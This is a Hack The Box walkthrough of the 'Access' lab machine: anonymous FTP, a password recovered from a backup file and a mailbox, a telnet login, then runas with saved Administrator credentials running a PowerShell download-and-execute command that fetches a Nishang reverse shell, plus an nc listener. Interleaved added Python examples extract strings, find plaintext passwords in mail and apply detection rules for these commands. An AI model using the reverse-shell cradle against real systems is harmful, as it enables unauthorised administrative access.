Access - Hack The Box

Shawn Newman
5 min read

Access is an easy difficulty Windows machine that begins with leveraging anonymous FTP access to obtain credentials and gain an initial foothold. Further local enumeration uncovers stored administrator credentials, which are then used to establish a reverse shell with administrative privileges.

User Flag:

Initial Enumeration:

sudo nmap -sC -sV -vv 10.10.10.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-24 15:43 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating Ping Scan at 15:43
Scanning 10.10.10.98 [4 ports]
Completed Ping Scan at 15:43, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.00s elapsed
Initiating SYN Stealth Scan at 15:43
Scanning 10.10.10.98 [1000 ports]
Discovered open port 21/tcp on 10.10.10.98
Discovered open port 80/tcp on 10.10.10.98
Discovered open port 23/tcp on 10.10.10.98
Completed SYN Stealth Scan at 15:43, 6.98s elapsed (1000 total ports)
Initiating Service scan at 15:43
Scanning 3 services on 10.10.10.98
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:45 (0:00:43 remaining)
Completed Service scan at 15:45, 163.63s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.98.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:45
NSE: [ftp-bounce 10.10.10.98:21] PORT response: 501 Server cannot accept argument.
Stats: 0:02:51 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 13 (12 waiting)
NSE Timing: About 96.95% done; ETC: 15:46 (0:00:00 remaining)
Completed NSE at 15:46, 14.26s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 1.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Nmap scan report for 10.10.10.98
Host is up, received echo-reply ttl 127 (0.081s latency).
Scanned at 2025-07-24 15:43:09 EDT for 186s
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet? syn-ack ttl 127
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:46
Completed NSE at 15:46, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.56 seconds
           Raw packets sent: 2005 (88.196KB) | Rcvd: 8 (336B)

The Nmap scan identified three open services—FTP, Telnet, and HTTP. Notably, the FTP service allows anonymous authentication.

Anonymous FTP Access:

ftp 10.10.10.98

After authenticating anonymously, two directories are visible, each containing files that can be downloaded and reviewed.

get backup.mdb
get Access\ Control.zip

Attempting to extract the Access Control archive prompts for a password we don’t yet possess. Instead, we pivot to analyzing the backup.mdb file. For files like this, running the strings utility is a quick way to surface human readable data—particularly useful when hunting for embedded credentials or other sensitive information.

strings backup.mdb

Running strings on the file exposes several human readable candidates for the ZIP password. The value that stands out is "access4u@security".
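Added example, not part of the original write-up: a small Python reimplementation of what `strings` does on the recovered backup, plus a scoring pass that explains why a token like "access4u@security" stands out among table and engine names. SAMPLE_MDB is a constructed blob, not the real backup.mdb.

```python
import re
import string

# Constructed sample: binary noise around a few readable runs, shaped like
# what a Jet/Access .mdb backup looks like under `strings`.
SAMPLE_MDB = (
    b"\x00\x01\x00\x00Standard Jet DB\x00\x00\x01"
    b"\x00\xff\xfeengineer\x00\x00\xc3\x11"
    b"access4u@security\x00\x00\x00\x02\x9f"
    b"\x7f\x13admin\x00\x00\x00\x00MSysObjects\x00"
)

# Printable ASCII minus control whitespace; a single space is allowed inside a run.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def printable_strings(data: bytes, min_len: int = 4):
    """Yield runs of at least min_len printable bytes (the `strings` default)."""
    run = bytearray()
    for byte in data:
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run.clear()
    if len(run) >= min_len:
        yield run.decode("ascii")


def password_score(candidate: str) -> int:
    """Count character classes present (lower, upper, digit, symbol); penalise
    very short, very long or space-containing runs, which are rarely secrets."""
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9\s]")
    score = sum(1 for pattern in classes if re.search(pattern, candidate))
    if " " in candidate or not 8 <= len(candidate) <= 64:
        score -= 1
    return score


def credential_candidates(data: bytes, min_score: int = 3) -> list:
    """Return the distinct strings in the blob that look password-like, best first."""
    found = set(printable_strings(data))
    ranked = sorted(found, key=password_score, reverse=True)
    return [s for s in ranked if password_score(s) >= min_score]
```

On the sample blob the only string reaching the threshold is the mixed-class token; engine and table names score 0 to 2 and drop out.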

Let’s attempt to extract the contents of the zip file using this password.

We’ve obtained a .pst (Personal Storage Table) file, which is Microsoft Outlook’s format for storing mail. To examine its contents, we can install pst-utils and use readpst to convert or extract the messages for review.

sudo apt install pst-utils
readpst Access\ Control.pst

There should now be a .mbox file that we are able to read.

cat Access\ Control.mbox

Reading the file reveals a password for the security account.
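Added example, not code from the original write-up: instead of eyeballing the converted mailbox with cat, this Python walks every message in a readpst-style .mbox with the standard library and flags lines that hand out a password in plain text, the kind of check a defender would run over exported mail archives before they end up on an anonymous FTP share. SAMPLE_MBOX, its addresses and EXAMPLE_PASSWORD_1 are constructed, not the box's real message.

```python
import mailbox
import re
import tempfile
from pathlib import Path

# Constructed two-message mailbox in the shape readpst produces.
SAMPLE_MBOX = """From MAILER-DAEMON Fri Aug 24 00:00:00 2018
From: john@megacorp.example
To: security@megacorp.example
Subject: Access Control System account
Content-Type: text/plain; charset="utf-8"

Hi,
The password for the "security" account has been changed to EXAMPLE_PASSWORD_1.
Please pass this on to your engineers.
John

From MAILER-DAEMON Fri Aug 24 01:00:00 2018
From: hr@megacorp.example
To: security@megacorp.example
Subject: Lunch
Content-Type: text/plain; charset="utf-8"

Pizza on Friday, bring your badge.
"""

# A credential keyword, then "is", "to" or ":", then the secret token itself.
CREDENTIAL_LINE = re.compile(
    r"\b(password|passwd|pwd|credentials?)\b.*?(?:\bis\b|\bto\b|:)\s*['\"]?([^\s'\".,;]+)",
    re.IGNORECASE,
)


def write_sample_mbox() -> str:
    """Write the constructed mailbox to a temp directory and return its path."""
    path = Path(tempfile.mkdtemp()) / "Access Control.mbox"
    path.write_text(SAMPLE_MBOX)
    return str(path)


def plain_text(msg) -> str:
    """Concatenate the text/plain parts of one message (readpst emits simple parts)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def find_plaintext_credentials(mbox_path: str) -> list:
    """Return one record per message line that appears to disclose a secret."""
    hits = []
    for msg in mailbox.mbox(mbox_path):
        for line in plain_text(msg).splitlines():
            m = CREDENTIAL_LINE.search(line)
            if m:
                hits.append({"from": msg["From"], "subject": msg["Subject"],
                             "keyword": m.group(1).lower(), "secret": m.group(2)})
    return hits
```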

Logging in as security:

Revisiting the initial Nmap results, Telnet is accessible and can be leveraged to obtain an interactive shell on the host.

telnet 10.10.10.98

Once logged in we can grab the user.txt flag located on the desktop of the security user.

Root Flag:

After initial enumeration, I identified a promising privilege escalation vector. A consistent “quick win” is to hunt for stored credentials which is something that should always be on your checklist. You can do this with the following command:

cmdkey /list

The enumeration results reveal cached Administrator credentials. By leveraging these, you can invoke runas to execute a Nishang reverse shell payload and establish an elevated session.

Let’s start off by cloning the nishang repository.

git clone https://github.com/samratashok/nishang.git

After cloning the repository, copy Invoke-PowerShellTcp.ps1 into a separate directory you’ll serve (e.g., via a simple HTTP server) so the target can download it directly.

cp /home/kali/tools/nishang/Shells/Invoke-PowerShellTcp.ps1 ~/htb/Access

Modify the Invoke-PowerShellTcp.ps1 script to specify your attacker machine’s IP address (and desired listener port) so the reverse shell initiates a direct connection back to you.

sudo vi Invoke-PowerShellTcp.ps1

At the bottom of the file place the following snippet:

Invoke-PowerShellTcp -Reverse -IPAddress <IP HERE> -Port 9001

Now host this file using Python’s simple HTTP server.

python3 -m http.server

Open a second terminal and start a Netcat listener to catch the incoming reverse shell from the Administrator context.

nc -lvnp 9001

Finally, from the compromised security user session, issue a web request that retrieves and executes the reverse shell script, causing it to run under the Administrator context.

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://IP HERE:8000/Invoke-PowerShellTcp.ps1')"

You should receive a connection back as the administrator account.

From this point you can grab the root.txt file from the Administrator’s Desktop.
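Added example, not part of the original write-up: the detection side of the escalation chain above. It scores constructed process-creation records (Sysmon Event ID 1 / Security 4688 style user, image and command line) for the three things this box exposes: cmdkey enumeration of stored credentials, runas with /savecred, and a PowerShell download-and-execute cradle. SAMPLE_EVENTS and the ATTACKER-IP host are constructed placeholders, not real telemetry.

```python
import re

# Constructed process-creation records; the first mirrors the command from the write-up.
SAMPLE_EVENTS = [
    {"user": "ACCESS\\security", "image": "C:\\Windows\\System32\\runas.exe",
     "cmdline": "runas /user:ACCESS\\Administrator /savecred \"powershell iex(new-object net.webclient)"
                ".downloadstring('http://ATTACKER-IP:8000/Invoke-PowerShellTcp.ps1')\""},
    {"user": "ACCESS\\security", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmdkey /list"},
    {"user": "ACCESS\\Administrator", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell iex(new-object net.webclient).downloadstring('http://ATTACKER-IP:8000/Invoke-PowerShellTcp.ps1')"},
    {"user": "ACCESS\\security", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad C:\\Users\\security\\Desktop\\notes.txt"},
]

# Single-pattern rules, keyed by tag name.
RULES = {
    "runas_savecred": re.compile(r"\brunas(\.exe)?\b.*?/savecred", re.I),
    "stored_cred_enum": re.compile(r"\bcmdkey(\.exe)?\b\s+/list", re.I),
}
# A download cradle needs both a fetch primitive and an in-memory execute.
CRADLE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
CRADLE_EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def classify(event: dict) -> list:
    """Return the tags that fire on one event's command line."""
    cmd = event["cmdline"]
    tags = [name for name, rx in RULES.items() if rx.search(cmd)]
    if CRADLE_FETCH.search(cmd) and CRADLE_EXEC.search(cmd):
        tags.append("ps_download_cradle")
    return tags


def severity(tags: list) -> str:
    """Saved-credential runas wrapping a cradle is the full chain; either alone is medium."""
    if "runas_savecred" in tags and "ps_download_cradle" in tags:
        return "high"
    if "runas_savecred" in tags or "ps_download_cradle" in tags:
        return "medium"
    return "low"  # e.g. cmdkey /list on its own is routine admin activity


def triage(events: list) -> list:
    """Keep only events that fired a rule, highest severity first (stable order otherwise)."""
    out = []
    for ev in events:
        tags = classify(ev)
        if tags:
            out.append({"user": ev["user"], "severity": severity(tags),
                        "tags": tags, "cmdline": ev["cmdline"]})
    return sorted(out, key=lambda e: SEVERITY_RANK[e["severity"]])
```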

Written by Shawn Newman